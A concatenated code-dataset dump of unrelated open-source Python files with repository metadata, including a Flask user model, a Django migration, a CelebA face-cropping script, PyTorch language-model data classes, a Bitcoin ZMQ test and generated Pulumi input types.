'W2': np.array([[-0.0104319 , -0.04019007, 0.01607211, 0.04440255]]),
'b1': np.array([[ -8.97523455e-07],
[ 8.15562092e-06],
[ 6.04810633e-07],
[ -2.54560700e-06]]),
'b2': np.array([[ 9.14954378e-05]])}
return parameters, X_assess
|
[
"544207374@qq.com"
] |
544207374@qq.com
|
d9e42f7c20892e299d99cc31c41b880619b60a1f
|
393d628ed83e40fbc45bde1fa77415446fa70e5d
|
/app/models.py
|
839a69e01df5020e0d29d54476dd8f51746a88a5
|
[] |
no_license
|
danoscarmike/cloud-run-clients
|
9c980d52efb621f4bd07f44b1cd75234e649d317
|
28efeb8ebc43474c5d9266b74198279a78a3893a
|
refs/heads/master
| 2020-07-06T18:02:44.503327
| 2020-03-15T04:36:28
| 2020-03-15T04:36:28
| 203,097,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,585
|
py
|
from app import db, login
from app.enums import ProtoSourceEnum
from datetime import datetime
from flask_login import UserMixin
from hashlib import md5
from werkzeug.security import check_password_hash, generate_password_hash
followers = db.Table(
'followers',
db.Column('follower_id', db.Integer, db.ForeignKey('user.id')),
db.Column('followed_service_id', db.Integer, db.ForeignKey('service.id'))
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
first_name = db.Column(db.String(128))
last_name = db.Column(db.String(128))
email = db.Column(db.String(128), index=True, unique=True)
password_hash = db.Column(db.String(128))
events = db.relationship('Event', backref='user', lazy='dynamic')
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime, default=datetime.utcnow)
services_followed = db.relationship(
'Service',
secondary=followers,
primaryjoin=(followers.c.follower_id == id),
backref=db.backref('followers', lazy='dynamic'),
lazy='dynamic'
)
def __repr__(self):
return f'<User {self.username} {self.id}>'
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return f'https://www.gravatar.com/avatar/{digest}?d=robohash&s={size}'
def is_following(self, service):
return self.services_followed.filter(
followers.c.followed_service_id == service.id).count() > 0
def follow(self, service):
if not self.is_following(service):
self.followed.append(service)
def unfollow(self, service):
if self.is_following(service):
self.followed.remove(service)
def followed_events(self):
return Event.query.join(
followers, (followers.c.followed_service_id ==
Event.service_id)).filter(
followers.c.follower_id == self.id).order_by(
Event.created.desc())
class Service(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
title = db.Column(db.String(128))
version = db.Column(db.String(64))
proto_url = db.Column(db.String(128))
proto_source = db.Column(db.Enum(ProtoSourceEnum))
is_google_api = db.Column(db.Boolean)
updated = db.Column(db.DateTime, index=True)
events = db.relationship('Event', backref='service', lazy='dynamic')
user_followers = db.relationship(
'User',
secondary=followers,
primaryjoin=(followers.c.followed_service_id == id),
backref=db.backref('followed', lazy='dynamic'),
lazy='dynamic'
)
def __repr__(self):
return f'<Service {self.name}:{self.version}>'
class Event(db.Model):
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, index=True)
service_id = db.Column(db.Integer, db.ForeignKey('service.id'))
success = db.Column(db.Boolean)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return f'<Event {self.id}>'
def format_datetime(self, created):
return self.created.strftime("%A, %b %d, %Y %t %Z")
@login.user_loader
def load_user(id):
return User.query.get(int(id))
|
[
"omeara.dan@gmail.com"
] |
omeara.dan@gmail.com
|
9f5e9d876177a2fc9c4febb4d2751b4545cf9e71
|
9a009af13c21ad04a818959a6bad5f149febbae3
|
/movie/migrations/0007_movie_slug.py
|
35882f7c30fe73b9c794e6bd138076707c8fa4c4
|
[] |
no_license
|
Surdy-A/SMBD
|
412089d8ce7369d679d0a3d10f853a6070498060
|
c3c6a9d7b5626bc931d77dbe617ed145be3dcf7e
|
refs/heads/master
| 2022-12-24T23:02:18.004371
| 2019-10-02T15:52:55
| 2019-10-02T15:52:55
| 212,331,313
| 0
| 0
| null | 2022-12-08T06:39:54
| 2019-10-02T12:11:17
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 388
|
py
|
# Generated by Django 2.0.12 on 2019-09-20 13:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movie', '0006_auto_20190919_2336'),
]
operations = [
migrations.AddField(
model_name='movie',
name='slug',
field=models.SlugField(blank=True, null=True),
),
]
|
[
"sodiq.ajayi@yahoo.com"
] |
sodiq.ajayi@yahoo.com
|
4a99813b5b510d1c3e54f984e37578b9b344e3bd
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/pydev/third_party/isort_container/isort/natural.py
|
aac8c4a36157fb3029c683d472cf5ff67163f7f9
|
[
"EPL-1.0",
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
"""isort/natural.py.
Enables sorting strings that contain numbers naturally
usage:
natural.nsorted(list)
Copyright (C) 2013 Timothy Edmund Crosley
Implementation originally from @HappyLeapSecond stack overflow user in response to:
http://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import re
def _atoi(text):
return int(text) if text.isdigit() else text
def _natural_keys(text):
return [_atoi(c) for c in re.split(r'(\d+)', text)]
def nsorted(to_sort, key=None):
"""Returns a naturally sorted list"""
if key is None:
key_callback = _natural_keys
else:
def key_callback(item):
return _natural_keys(key(item))
return sorted(to_sort, key=key_callback)
|
[
"Elizaveta.Shashkova@jetbrains.com"
] |
Elizaveta.Shashkova@jetbrains.com
|
760ff8aa460a84a683f8d82b749f8a0b113441e6
|
f5c3c9e0f48ae65e730521465d3eaccba3790403
|
/gene-names-pipeline/map-gene-names.py
|
7d74dba1ded9f81044afc24874660b76cca704e6
|
[] |
no_license
|
chair300/atsnp_pipeline
|
fc6c7dc24a421e2e50aa364cbdb4a259451637bc
|
6cc5a0256c4c9254f98da7f4b9ca0d660cf0a46d
|
refs/heads/master
| 2023-03-15T21:51:01.855949
| 2017-12-27T22:55:11
| 2017-12-27T22:55:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,170
|
py
|
import re
import pickle
import json
from elasticsearch import Elasticsearch, helpers
DRY_RUN = False
#Run without indexing into Elasticsearch, in case something looks fishy.
#For test mode: INDEX_NAME = 'gencode_genes_test_1'
INDEX_NAME = 'gencode_genes'
#for old cluster: ELASTIC_URLS = [ 'atsnp-db1', 'atsnp-db2', 'atsnp-db3']
#No need to round-robin this anymore.
ELASTIC_URLS = [ 'db05']
# This works in place in very short time.
# Don't hestate to just delete the whole index and rebuild.
def get_one_bulk_action_json(json_record):
#index was atsnp_data
bulkj = {
'_index': INDEX_NAME,
'_type' : 'gencode_gene_symbols',
'_source': json_record
}
return bulkj
def put_bulk_json_into_elasticsearch(es, action):
#print "length of action : " + str(len(action))
son = json.dumps(action)
#index="gencode_genes",
result = \
helpers.bulk(es, action, index=INDEX_NAME,
doc_type="gencode_gene_symbols")
return result
gene_map_file = 'correct-gencode-genes'
with open(gene_map_file) as f:
lines = f.readlines()
es = Elasticsearch(ELASTIC_URLS)
action = []
es_chunk_size = 150
i = 0
#skip the header line.
for line in lines[1:]:
split_line = line.split()
chromosome = split_line[2]
start_pos = split_line[4]
end_pos = split_line[5]
gene_symbol = split_line[12]
#print "line ; " debug purposes only:
#for oneitem, k in enumerate(split_line):
# print str(k), oneitem
j_dict = { "chr" : chromosome,
"start_pos" : start_pos,
"end_pos" : end_pos,
"gene_symbol" : gene_symbol
}
#print "jdict : " + repr(j_dict)
assert(start_pos.isdigit())
assert(end_pos.isdigit())
#assert(chromosome.replace('chr', '').isdigit())
action.append(j_dict)
i = i + 1
if i % es_chunk_size == 0:
print "reached " + str(i) + " rows."
if not DRY_RUN:
result = put_bulk_json_into_elasticsearch(es, action)
action = []
print "placing the last " + str(len(action)) + " gene names into the database."
put_bulk_json_into_elasticsearch(es, action)
|
[
"rebeccakathrynhudson@gmail.com"
] |
rebeccakathrynhudson@gmail.com
|
25a8a889ea54141721a089bb297bfc32aba9006e
|
645c02b8414bee331d008f0724f30b088455bc1b
|
/celebA_parser.py
|
d22e8fe601a463332ed0baaea96323d4e3e547b7
|
[] |
no_license
|
tdrvlad/dataset-parsers
|
e3cdb66d2b69edf73d6be25289b1d22826df7404
|
f15bbd5914160a12637d0fd95478595028600b75
|
refs/heads/main
| 2023-03-30T17:31:28.440023
| 2021-04-06T15:43:32
| 2021-04-06T15:43:32
| 355,243,490
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,997
|
py
|
import os
import glob
import json
import shutil
from mtcnn.mtcnn import MTCNN
from PIL import Image
from numpy import asarray
identities_file = 'identity_CelebA.txt'
raw_dataset_dir = 'img_align_celeba_png'
processed_dataset_dir = 'CelebA_Faces'
MIN_IMG_PER_PERSON = 10
TRAIN_EVAL_SPLIT = 0.85
if os.path.exists(processed_dataset_dir):
shutil.rmtree(processed_dataset_dir)
os.mkdir(processed_dataset_dir)
os.mkdir(os.path.join(processed_dataset_dir, 'train'))
os.mkdir(os.path.join(processed_dataset_dir, 'test'))
def extract_face(filename, required_size=(240, 240)):
# load image from file
image = Image.open(filename)
# convert to RGB, if needed
image = image.convert('RGB')
# convert to array
pixels = asarray(image)
# create the detector, using default weights
detector = MTCNN()
# detect faces in the image
results = detector.detect_faces(pixels)
# extract the bounding box from the first face
try:
x1, y1, width, height = results[0]['box']
# bug fix
x1, y1 = abs(x1), abs(y1)
x2, y2 = x1 + width, y1 + height
# extract the face
face = pixels[y1:y2, x1:x2]
# resize pixels to the model size
image = Image.fromarray(face)
image = image.resize(required_size)
return image
except:
return None
identities_lines = open(identities_file, 'r').readlines()
persons = {}
for line in identities_lines:
split_line = line.split()
img_file = split_line[0].split('.')[0] + '.png'
person_id = split_line[1].rstrip('\n')
if persons.get(person_id) is None:
persons[person_id] = []
persons[person_id].append(img_file)
print('Found {} unique persons.'.format(len(persons.keys())))
for person_id, image_files in persons.items():
if len(image_files) > MIN_IMG_PER_PERSON:
train_person_dir = os.path.join(processed_dataset_dir, 'train', 'person_{}'.format(person_id))
test_person_dir = os.path.join(processed_dataset_dir, 'test', 'person_{}'.format(person_id))
if not os.path.exists(train_person_dir):
os.mkdir(train_person_dir)
if not os.path.exists(test_person_dir):
os.mkdir(test_person_dir)
split = int(TRAIN_EVAL_SPLIT * len(image_files))
j=0
for f in image_files[:split]:
image_face = extract_face(os.path.join(raw_dataset_dir,f))
if not image_face is None:
image_face.save(os.path.join(train_person_dir, 'img_{}.png'.format(j)))
j += 1
j=0
for f in image_files[split:]:
image_face = extract_face(os.path.join(raw_dataset_dir,f))
if not image_face is None:
image_face.save(os.path.join(test_person_dir, 'img_{}.png'.format(j)))
j += 1
else:
print('Not enough images')
|
[
"noreply@github.com"
] |
tdrvlad.noreply@github.com
|
8e755e05fe9f1570a29aab3b8c2a2dd8a369f742
|
506f74a5172d6fdfeed257374f164fa6852819be
|
/nlp_pytorch/language_model_p2/data.py
|
f5a437c9263994d1b685c699c457fd911fe2cad0
|
[
"MIT"
] |
permissive
|
RegiusQuant/nlp-practice
|
b1047911dd2fe976b650530230b64dac251c4dce
|
ffa99aa585134941aa148da11775c2b16d42eef7
|
refs/heads/master
| 2021-01-06T09:09:08.304223
| 2020-04-18T06:21:01
| 2020-04-18T06:21:01
| 241,273,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,489
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2020/3/18 上午11:52
# @Author : RegiusQuant <315135833@qq.com>
# @Project : nlp-practice
# @File : data.py
# @Desc : 语言模型所需的数据存储结构
from collections import Counter
from pathlib import Path
from typing import List, Tuple
import numpy as np
import torch
import torch.nn as nn
class Vocab:
"""单词表类, 用于存储单词相关的数据结构
Args:
vocab_path (Path): 单词表文件路径
Attributes:
stoi (Dict): 存储每个单词对应索引的字典
itos (List): 单词列表
"""
def __init__(self, vocab_path: Path):
self.stoi = {} # token -> index (dict)
self.itos = [] # index -> token (list)
with open(vocab_path) as f:
# bobsue.voc.txt中, 每一行是一个单词
for w in f.readlines():
w = w.strip()
if w not in self.stoi:
self.stoi[w] = len(self.itos)
self.itos.append(w)
def __len__(self):
return len(self.itos)
class SentCorpus:
"""基于单句训练的语料库
Args:
data_path (Path): 数据集路径
uniform (bool): 是否采用均匀分布采样
freq_coef (float): 使用词频采样时的提升系数
Attributes:
vocab (Vocab): 单词表类的实例
train_data (List): 保存训练句子单词索引的列表
valid_data (List): 保存验证句子单词索引的列表
test_data (List): 保存测试句子单词索引的列表
word_counter (Counter): 保存有训练句子中出现单词的计数器
word_freqs (List): 训练数据中的单词采样词频
"""
def __init__(self, data_path: Path, uniform: bool = False, freq_coef: float = 0.1):
self.vocab = Vocab(data_path / 'bobsue.voc.txt')
self.train_data = self.tokenize(data_path / 'bobsue.lm.train.txt')
self.valid_data = self.tokenize(data_path / 'bobsue.lm.dev.txt')
self.test_data = self.tokenize(data_path / 'bobsue.lm.test.txt')
# 统计训练集的单词计数
self.word_counter = Counter()
for x in self.train_data:
# 注意<s>不在我们的预测范围内,不要统计
self.word_counter += Counter(x[1:])
if uniform: # 均匀分布
self.word_freqs = np.array([0.] + [1. for _ in range(len(self.vocab) - 1)], dtype=np.float32)
self.word_freqs = self.word_freqs / sum(self.word_freqs)
else: # 词频分布(提升freq_coef次方)
self.word_freqs = np.array([self.word_counter[i] for i in range(len(self.vocab))], dtype=np.float32)
self.word_freqs = self.word_freqs / sum(self.word_freqs)
self.word_freqs = self.word_freqs**freq_coef
self.word_freqs = self.word_freqs / sum(self.word_freqs)
def tokenize(self, text_path: Path) -> List[List[int]]:
"""将文本中所有句子转换为单词序号列表
Args:
text_path (Path): 文本路径
Returns:
index_data (List): 处理为序号的列表
"""
with open(text_path) as f:
index_data = [] # 索引数据,存储每个样本的单词索引列表
for s in f.readlines():
index_data.append(self.sentence_to_index(s))
return index_data
def sentence_to_index(self, s: str) -> List[int]:
"""将由字符串表示的一句话转换为单词序号列表
Args:
s (str): 句子字符串
Returns:
result (List): 句子转换后的序号列表
"""
return [self.vocab.stoi[w] for w in s.split()]
def index_to_sentence(self, x: List[int]) -> str:
"""将单词序号列表转换成对应的字符串
Args:
x (List): 由单词序号构成的列表
Returns:
result (str): 序号列表转换后的字符串
"""
return ' '.join([self.vocab.itos[i] for i in x])
class NegSampleDataSet(torch.utils.data.Dataset):
"""负例采样的PyTorch数据集
Args:
index_data (List): 语料库中的编号数据
word_freqs (List): 负例采样的词频列表
n_negs (int): 负例采样数目
"""
def __init__(self, index_data: List[List[int]], word_freqs: List[float], n_negs: int = 20):
self.index_data = index_data # 转换为序号的文本
self.n_negs = n_negs # 生成负例个数
self.word_freqs = torch.FloatTensor(word_freqs) # 词频
def __getitem__(self, i):
inputs = torch.LongTensor(self.index_data[i][:-1])
poss = torch.LongTensor(self.index_data[i][1:])
# 生成n_negs个负例
negs = torch.zeros((len(poss), self.n_negs), dtype=torch.long)
for i in range(len(poss)):
negs[i] = torch.multinomial(self.word_freqs, self.n_negs)
return inputs, poss, negs
def __len__(self):
return len(self.index_data)
def neglm_collate_fn(batch):
# 首先将batch的格式进行转换
# batch[0]:Inputs
# batch[1]: Poss
# batch[2]: Negs
batch = list(zip(*batch))
# lengths: (batch_size)
lengths = torch.LongTensor([len(x) for x in batch[0]])
# inputs: (batch_size, max_len)
inputs = nn.utils.rnn.pad_sequence(batch[0], batch_first=True)
# poss: (batch_size, max_len)
poss = nn.utils.rnn.pad_sequence(batch[1], batch_first=True)
# negs: (batch_size, max_len, n_negs)
negs = nn.utils.rnn.pad_sequence(batch[2], batch_first=True)
# mask: (batch_size, max_len)
mask = (poss != 0).float()
return inputs, poss, negs, lengths, mask
class ContextCorpus:
"""基于上下文的语料库
Args:
data_path (Path): 数据集路径
Attributes:
vocab (Vocab): 单词表类的实例
train_data (List): 保存训练上下文句子单词索引的列表
valid_data (List): 保存验证上下文句子单词索引的列表
test_data (List): 保存测试上下文句子单词索引的列表
"""
def __init__(self, data_path: Path):
self.vocab = Vocab(data_path / 'bobsue.voc.txt')
self.train_data = self.tokenize(data_path / 'bobsue.prevsent.train.tsv')
self.valid_data = self.tokenize(data_path / 'bobsue.prevsent.dev.tsv')
self.test_data = self.tokenize(data_path / 'bobsue.prevsent.test.tsv')
def tokenize(self, text_path: Path) -> List[Tuple[List[int], List[int]]]:
"""将文本中上下文句子转换为单词序号列表
Args:
text_path (Path): 文本路径
Returns:
index_data (List): 经过处理后的列表
"""
with open(text_path) as f:
index_data = []
for s in f.readlines():
t = s.split('\t')
index_data.append((self.sentence_to_index(t[0]), self.sentence_to_index(t[1])))
return index_data
def sentence_to_index(self, s):
return [self.vocab.stoi[w] for w in s.split()]
def index_to_sentence(self, x):
return ' '.join([self.vocab.itos[i] for i in x])
class ContextDataset(torch.utils.data.Dataset):
"""基于上下文的PyTorch数据集
Args:
index_data (List): 语料库中的编号数据
"""
def __init__(self, index_data: List[Tuple[List[int], List[int]]]):
self.index_data = index_data
def __getitem__(self, i):
contexts = torch.LongTensor(self.index_data[i][0])
inputs = torch.LongTensor(self.index_data[i][1][:-1])
targets = torch.LongTensor(self.index_data[i][1][1:])
return contexts, inputs, targets
def __len__(self):
return len(self.index_data)
def ctxlm_collate_fn(batch):
# 首先将batch的格式进行转换
# batch[0]:Contexts
# batch[1]: Inputs
# batch[2]: Targets
batch = list(zip(*batch))
ctx_lengths = torch.LongTensor([len(x) for x in batch[0]])
inp_lengths = torch.LongTensor([len(x) for x in batch[1]])
contexts = nn.utils.rnn.pad_sequence(batch[0], batch_first=True)
inputs = nn.utils.rnn.pad_sequence(batch[1], batch_first=True)
targets = nn.utils.rnn.pad_sequence(batch[2], batch_first=True)
mask = (targets != 0).float()
return contexts, inputs, targets, ctx_lengths, inp_lengths, mask
|
[
"315135833@qq.com"
] |
315135833@qq.com
|
d85e8d89a929f0e2acec6b0095ee30e829f41f19
|
ceb2a3d736e0c187eb67b064697409e919660e5a
|
/qa/rpc-tests/zmq_test.py
|
0ad942eb848fbf6240163caf257a630cf6ab822a
|
[
"MIT"
] |
permissive
|
ARMROfficial/armr
|
6405117c8ad936985ff71397a9dc0e65d37c1357
|
6bc69a9dcb3ae6b26de435c1906681b3a7dd4ad4
|
refs/heads/master
| 2021-06-11T05:30:08.314912
| 2020-01-24T03:45:33
| 2020-01-24T03:45:33
| 128,578,630
| 4
| 5
|
MIT
| 2020-01-21T21:12:19
| 2018-04-07T23:57:59
|
C
|
UTF-8
|
Python
| false
| false
| 2,579
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test ZMQ interface
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import zmq
import struct
import http.client
import urllib.parse
class ZMQTest (BitcoinTestFramework):
port = 28332
def setup_nodes(self):
self.zmqContext = zmq.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashblock")
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % self.port)
return start_nodes(4, self.options.tmpdir, extra_args=[
['-zmqpubhashtx=tcp://127.0.0.1:'+str(self.port), '-zmqpubhashblock=tcp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
genhashes = self.nodes[0].generate(1)
self.sync_all()
print("listen...")
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
blkhash = bytes_to_hex_str(body)
assert_equal(genhashes[0], blkhash) #blockhash from generate must be equal to the hash received over zmq
n = 10
genhashes = self.nodes[1].generate(n)
self.sync_all()
zmqHashes = []
for x in range(0,n*2):
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
if topic == b"hashblock":
zmqHashes.append(bytes_to_hex_str(body))
for x in range(0,n):
assert_equal(genhashes[x], zmqHashes[x]) #blockhash from generate must be equal to the hash received over zmq
#test tx from a second node
hashRPC = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# now we should receive a zmq msg because the tx was broadcast
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
hashZMQ = ""
if topic == b"hashtx":
hashZMQ = bytes_to_hex_str(body)
assert_equal(hashRPC, hashZMQ) #blockhash from generate must be equal to the hash received over zmq
if __name__ == '__main__':
ZMQTest ().main ()
|
[
"info@armr.network"
] |
info@armr.network
|
e7a75c3b395dff6c3e3842c9ac8476cae17a8b18
|
d405bb83325fd67f73b1afec5ea1b9753eae1a8f
|
/blog_project/urls.py
|
30853b9685e3f49bae78daa8a641c099c04a98f7
|
[] |
no_license
|
Vanman007/Bolg_Django
|
494c3a42a6970f940a7640ea96505876fa56b3a2
|
9fa2990a8be3f93e944185b2ca7826c57059e096
|
refs/heads/master
| 2023-08-15T07:05:16.990132
| 2020-07-26T22:47:48
| 2020-07-26T22:47:48
| 281,990,047
| 0
| 0
| null | 2021-09-22T19:33:28
| 2020-07-23T15:33:25
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
"""blog_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('accounts/', include('django.contrib.auth.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('accounts.urls')),
path('', include('blog.urls')),
]
|
[
"thom37q2@stud.kea.dk"
] |
thom37q2@stud.kea.dk
|
e5c406a66eeb94f75d2362486e5ffddcf2c9956f
|
c75ec82316ed5322c5844912ce9c528c24360b9f
|
/nsd1906/py02/day02/account.py
|
d2d397a56fbbf6a198d9fc229d9b508fd56841f5
|
[] |
no_license
|
MrZhangzhg/nsd2019
|
a94cde22f2e4bd648bb9e56ca63827f558f3c083
|
54f6d2c7b348a69f13ad5f38f2fbdc8207528749
|
refs/heads/master
| 2021-08-22T17:38:27.697675
| 2020-02-22T08:36:21
| 2020-02-22T08:36:21
| 183,539,489
| 21
| 24
| null | 2020-05-17T12:07:55
| 2019-04-26T02:06:16
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,120
|
py
|
import os
import pickle
from time import strftime
def save(fname):
amount = int(input('金额: '))
comment = input('备注: ')
date = strftime('%Y-%m-%d')
# 从文件中取出全部记录
with open(fname, 'rb') as fobj:
records = pickle.load(fobj)
# 计算最新余额
balance = records[-1][-2] + amount
record = [date, amount, 0, balance, comment]
records.append(record)
# 把更新后的列表再次存入文件
with open(fname, 'wb') as fobj:
pickle.dump(records, fobj)
def cost(fname):
amount = int(input('金额: '))
comment = input('备注: ')
date = strftime('%Y-%m-%d')
# 从文件中取出全部记录
with open(fname, 'rb') as fobj:
records = pickle.load(fobj)
# 计算最新余额
balance = records[-1][-2] - amount
record = [date, 0, amount, balance, comment]
records.append(record)
# 把更新后的列表再次存入文件
with open(fname, 'wb') as fobj:
pickle.dump(records, fobj)
def query(fname):
# 取出全部的记录
with open(fname, 'rb') as fobj:
records = pickle.load(fobj)
# 打印表头
print(
'%-12s%-8s%-8s%-12s%-20s' % ('date', 'save', 'cost', 'balance', 'comment')
)
# 打印记录
for record in records:
print('%-12s%-8s%-8s%-12s%-20s' % tuple(record))
def show_menu():
cmds = {'0': save, '1': cost, '2': query}
prompt = """(0) save
(1) cost
(2) query
(3) quit
Please input your choice(0/1/2/3): """
fname = 'account.data'
init_data = [
[strftime('%Y-%m-%d'), 0, 0, 10000, 'init data']
]
# 如果文件不存在,把初始化数据写进去
if not os.path.exists(fname):
with open(fname, 'wb') as fobj:
pickle.dump(init_data, fobj)
while 1:
choice = input(prompt).strip()
if choice not in ['0', '1', '2', '3']:
print('无效的输入,请重试。')
continue
if choice == '3':
print('\nBye-bye')
break
cmds[choice](fname)
if __name__ == '__main__':
show_menu()
|
[
"zhangzg@tedu.cn"
] |
zhangzg@tedu.cn
|
eb25cf75636dd11070f415590bf264ca641b7f5e
|
1821570d417029fb4385abe88f760bda6e3293bc
|
/Day8/main.py
|
6ea7e75202e127b5e616993061856b73283c38b4
|
[] |
no_license
|
d-gallagher/AdventOfCode2019
|
86ce5d6eadccc3a45b6bd10e8b6026167cc4376a
|
c15b8bd0957bab542af7c90189b7420b52052c2b
|
refs/heads/main
| 2023-01-20T23:00:15.823141
| 2020-12-01T00:20:42
| 2020-12-01T00:20:42
| 310,332,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
# test input
# 123456789012
def split_img(file, width, height):
# img = []
zeroes = []
ones = []
twos = []
onetwo = []
with open(file, "r") as infile:
while True:
# read in pixels and process
pixels = infile.read(width * height)
if not pixels:
break
zero, one, two = count_zeroes_ones_twos(pixels)
# layer = get_layer(pixels, width, height)
# #
# img.append(layer)
zeroes.append(zero)
ones.append(one)
twos.append(two)
onetwo.append(one * two)
return zeroes, ones, twos, onetwo
def get_layer(pixels, width, height):
layer = []
for _ in range(height):
row = pixels[:width]
layer.append(row)
return layer
def count_zeroes_ones_twos(pixels):
zeroes = ones = twos = 0
for idx, x in enumerate(pixels):
if x == '0':
zeroes += 1
if x == '1':
ones += 1
if x == '2':
twos += 1
return zeroes, ones, twos
zeroes, ones, twos, onetwo = split_img("input.txt", 25, 6)
min_zero = min(zeroes)
for z, o, t, ot, in zip(zeroes, ones, twos, onetwo):
if z == min_zero:
print(f'{z}, {o}, {t}, {ot}')
|
[
"jibisjib@gmail.com"
] |
jibisjib@gmail.com
|
fd87448c5d3b6d774860df0ffbf48bbac40ed2a6
|
ee6acbd5fcd0fcd16230e96a4a539de41a02c97e
|
/operators/global-load-balancer-operator/python/pulumi_pulumi_kubernetes_crds_operators_global_load_balancer_operator/redhatcop/v1alpha1/_inputs.py
|
ec8c072135f299e523e34ac2e783a59dd8b97f1f
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulumi-kubernetes-crds
|
777e78137aaf6525a44b61a02dccf91bf0d87a14
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
refs/heads/master
| 2023-03-15T04:29:16.039753
| 2020-12-30T19:35:54
| 2020-12-30T19:35:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84,115
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GlobalDNSRecordSpecArgs',
'GlobalDNSRecordSpecEndpointsArgs',
'GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs',
'GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs',
'GlobalDNSRecordSpecGlobalZoneRefArgs',
'GlobalDNSRecordSpecHealthCheckArgs',
'GlobalDNSRecordSpecHealthCheckExecArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetPortArgs',
'GlobalDNSRecordSpecHealthCheckTcpSocketArgs',
'GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs',
'GlobalDNSRecordStatusArgs',
'GlobalDNSRecordStatusConditionsArgs',
'GlobalDNSRecordStatusEndpointStatusesArgs',
'GlobalDNSRecordStatusMonitoredServiceStatusesArgs',
'GlobalDNSRecordStatusProviderStatusArgs',
'GlobalDNSRecordStatusProviderStatusRoute53Args',
'GlobalDNSZoneSpecArgs',
'GlobalDNSZoneSpecProviderArgs',
'GlobalDNSZoneSpecProviderExternalDNSArgs',
'GlobalDNSZoneSpecProviderRoute53Args',
